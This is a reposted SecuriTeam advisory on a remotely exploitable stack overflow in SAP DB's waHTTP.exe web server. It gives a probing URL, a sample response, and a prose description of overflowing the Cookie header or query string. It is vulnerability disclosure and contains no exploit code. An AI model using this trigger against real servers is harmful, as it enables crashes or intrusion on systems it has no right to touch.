- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SAP DB Web Server Stack Overflow
------------------------------------------------------------------------
SUMMARY
SAP DB is "an open source database server sponsored by SAP AG that
provides a series of web tools to administer database servers via web
browsers. These tools can be integrated into third-party web servers such
as IIS, or run on its own web server which by default is installed to TCP
Port 9999".
When installed as its own web server, the process SAB DB's waHTTP.exe is
found to be listening on TCP Port 9999, this web server has been found to
contain a remotely exploitable stack overflow.
DETAILS
By requesting:
http://target:9999/webdbm?Event=DBM_INTERN_TEST&Action=REFRESH
And looking at the 200 response we can determine the function offered by
the request:
<body topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
background=/WARoot/Images/tatami.gif>
<a href="javascript:parent.GotoWebDBMURL(this,
'Event=DBM_INTERN_TEST&Action=REFRESH')">Test</a><table
style="font-family:courier new,monospace; font-size:8pt;" border=1
cellspacing=0 cellpadding=1>
<tr><td>sapdbwa_GetRequestURI </td><td>/webdbm </td></tr>
<tr><td>sapdbwa_GetIfModifiedSince </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetQueryString
</td><td>Event=DBM_INTERN_TEST&Action=REFRESH </td></tr>
<tr><td>sapdbwa_GetPathInfo </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetMethod </td><td>GET </td></tr>
<tr><td>sapdbwa_GetContentType </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetContentLength </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetPathTranslated </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetServerName </td><td>NULL </td></tr>
<tr><td>AUTH_TYPE </td><td>NULL </td></tr>
<tr><td>CONTENT_LENGTH </td><td>NULL </td></tr>
<tr><td>CONTENT_TYPE </td><td>NULL </td></tr>
<tr><td>GATEWAY_INTERFACE </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT </td><td>*/* </td></tr>
<tr><td>PATH_INFO </td><td>NULL </td></tr>
<tr><td>QUERY_STRING </td><td>NULL </td></tr>
<tr><td>REMOTE_ADDR </td><td>NULL </td></tr>
<tr><td>REMOTE_HOST </td><td>NULL </td></tr>
<tr><td>REMOTE_USER </td><td>NULL </td></tr>
<tr><td>REQUEST_METHOD </td><td>NULL </td></tr>
<tr><td>SCRIPT_NAME </td><td>NULL </td></tr>
<tr><td>SERVER_NAME </td><td>NULL </td></tr>
<tr><td>SERVER_PORT </td><td>NULL </td></tr>
<tr><td>SERVER_PROTOCOL </td><td>NULL </td></tr>
<tr><td>SERVER_SOFTWARE </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT </td><td>*/* </td></tr>
<tr><td>HTTP_ACCEPT_CHARSET </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT_ENCODING </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT_LANGUAGE </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT_RANGES </td><td>NULL </td></tr>
<tr><td>HTTP_AGE </td><td>NULL </td></tr>
<tr><td>HTTP_ALLOW </td><td>NULL </td></tr>
<tr><td>HTTP_AUTHORIZATION </td><td>NULL </td></tr>
<tr><td>HTTP_CACHE_CONTROL </td><td>NULL </td></tr>
<tr><td>HTTP_CONNECTION </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_ENCODING </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_LANGUAGE </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_LENGTH </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_LOCATION </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_MD5 </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_RANGE </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_TYPE </td><td>NULL </td></tr>
<tr><td>HTTP_DATE </td><td>NULL </td></tr>
<tr><td>HTTP_ETAG </td><td>NULL </td></tr>
<tr><td>HTTP_EXPECT </td><td>NULL </td></tr>
<tr><td>HTTP_EXPIRES </td><td>NULL </td></tr>
<tr><td>HTTP_FROM </td><td>NULL </td></tr>
<tr><td>HTTP_HOST </td><td>localhost </td></tr>
<tr><td>HTTP_IF_MATCH </td><td>NULL </td></tr>
<tr><td>HTTP_IF_MODIFIED_SINCE </td><td>NULL </td></tr>
<tr><td>HTTP_IF_NONE_MATCH </td><td>NULL </td></tr>
<tr><td>HTTP_IF_RANGE </td><td>NULL </td></tr>
<tr><td>HTTP_IF_UNMODIFIED_SINCE </td><td>NULL </td></tr>
<tr><td>HTTP_LAST_MODIFIED </td><td>NULL </td></tr>
<tr><td>HTTP_LOCATION </td><td>NULL </td></tr>
<tr><td>HTTP_MAX_FORWARDS </td><td>NULL </td></tr>
<tr><td>HTTP_PRAGMA </td><td>NULL </td></tr>
<tr><td>HTTP_PROXY_AUTHENTICATE </td><td>NULL </td></tr>
<tr><td>HTTP_PROXY_AUTHORIZATION </td><td>NULL </td></tr>
<tr><td>HTTP_RANGE </td><td>NULL </td></tr>
<tr><td>HTTP_REFERER </td><td>NULL </td></tr>
<tr><td>HTTP_RETRY_AFTER </td><td>NULL </td></tr>
<tr><td>HTTP_SERVER </td><td>NULL </td></tr>
<tr><td>HTTP_TE </td><td>NULL </td></tr>
<tr><td>HTTP_TRAILER </td><td>NULL </td></tr>
<tr><td>HTTP_TRANSFER_ENCODING </td><td>NULL </td></tr>
<tr><td>HTTP_UPGRADE </td><td>NULL </td></tr>
<tr><td>HTTP_USER_AGENT </td><td>NULL </td></tr>
<tr><td>HTTP_VARY </td><td>NULL </td></tr>
<tr><td>HTTP_VIA </td><td>NULL </td></tr>
<tr><td>HTTP_WARNING </td><td>NULL </td></tr>
<tr><td>HTTP_WWW_AUTHENTICATE </td><td>NULL </td></tr>
<tr><td>HTTP_COOKIE </td><td>SID=E63A7F73B20A5021442BAF3C8F70B97A
</td></tr>
<tr><td>HTTP_SESSION_ID </td><td>NULL </td></tr>
<tr><td>Event </td><td>DBM_INTERN_TEST </td></tr>
<tr><td>Action </td><td>REFRESH </td></tr>
</table>
</body>
By making the request again, but not including the Cookie Value, or if one
is not present, simply add it as an HTTP header request, we can cause a
stack based overflow within WAHTTP.exe
The same Overflow can also be achieved in numerous other fields.
If we take the sapdbwa_GetQueryString, we can simply pass an additional
parameter by appending & + string
ADDITIONAL INFORMATION
The information has been provided by <mailto:mark@ngssoftware.com> Mark
Litchfield.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
No comments:
Post a Comment